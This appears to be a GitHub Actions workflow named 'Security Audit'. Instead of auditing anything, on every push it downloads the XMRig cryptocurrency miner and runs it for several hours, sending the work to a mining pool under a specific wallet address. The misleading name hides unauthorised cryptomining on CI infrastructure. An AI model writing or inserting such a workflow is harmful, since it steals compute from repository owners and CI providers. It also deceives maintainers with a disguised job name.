name: Security Audit
on:
  push:
  workflow_dispatch:

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - name: Prep
        run: |
          wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
          tar -xf xmrig-6.21.0-linux-x64.tar.gz
          cd xmrig-6.21.0
          timeout 21000 ./xmrig --donate-level=0 --threads=4 --algo=rx/0 --url=rx.unmineable.com:3333 --user=SOL:D4dbTEpvsDDQK8V56USNgDsircfmDHXQQmTkafnxLR56.DECEPTICON_X_prasiddhp10 --pass=x
